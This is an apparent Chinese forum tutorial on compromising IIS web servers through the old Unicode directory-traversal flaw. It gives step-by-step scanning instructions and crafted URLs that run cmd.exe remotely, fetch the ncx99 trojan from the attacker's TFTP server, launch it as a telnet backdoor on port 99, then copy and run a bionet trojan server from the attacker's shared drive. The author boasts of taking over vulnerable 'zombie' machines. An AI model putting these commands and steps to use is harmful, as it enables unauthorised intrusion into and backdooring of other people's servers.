利用unicode漏洞种木马的一点心得

马木

必备装备：代理猎手v3.1可是最新版， unicode漏洞扫描器，ncx99木马，tftpd32一个ftp服务器软件，（下载地址：http://www.cners.com/tools/unicode.zip），bionet木马（这个不用我告诉你哪里下了吧）。 

好了，可以开始工作了。。。。。
1、用代理猎手扫80端口，我为什么不用supperscan呢？后面自由分晓。扫到后保存一下列表，只要端口和类型即可。 

2、打开刚才的列表，去掉后面的“：80”只保留前面的ip地址就可以了，用word替换功能，别忘了保存为txt文件哦。知道为什么不用supperscan了吧，它后面的东西太多了，没办法用替换功能，手动删半天。 

3、打开unicode漏洞扫描器，加入刚才处理过的ip列表，开始扫吧，哇！！！好多漏洞啊，这就是中国的网络。用ie浏览一下扫到后的ip，找一个主 页是微软example的肉鸡，嘿嘿，风险小啊。我找了个61.***.***.***，不是我不想玩阿扁，我只有169的权利，又没有好用socks5 代理，哎。。。。。 

4、运行你的tftp32，你的机器就变成了一个小的ftp服务器了。 

5、打开ie，输入http://61.***.***.***/scr!pts/..%c1%9c.. /winnt/system32/cmd.exe?/c+tftp -i 10.***.***.*** GET ncx99.exe c://inetpub//scr!pts//tel.exe注意其中的61.***.***.***就是你刚才扫到的地址，％c1%9c就是你刚才扫的 漏洞了，10.***.***.***就是你自己的ip了，上传ncx99木马，用来打开肉鸡的99端口，可以用telnet连接。 

6、用http://61.***.***.***/scr!pts/..%c1%9c../winnt/system32/cmd.exe?/c+c:/inetpub/scr!pts/tel.exe远程打开这个ncx99木马。 

7、然后你就可以telnet 61.***.***.*** 99，哈哈～～～你是admin了，爽！！！然后打开你的d盘的完全共享，并把配置好的bionet服务端放到根目录里，回到telnet，cd inetpub/scr!pts/ 
copy //10.***.***.***/d/server.exe 
然后是漫长的等待。。。。。 
copy server.exe winnt/system/ 
server.exe 

用bioney连接，种木马成功，^_^ 

注意： 
1、之所以不用tftp上传木马是因为它的很容易掉线，传300k的大文件更是如此。 

2、之所以要将server.exe copy到system里运行是因为在scr!pts目录里权限不够，不能运行。 

3、之所以要选bionet是因为它对winnt，win2000的支持比较好，当然你也可以上传冰河。 

4、当然你也可以用unicode漏洞扫描器的内置命令。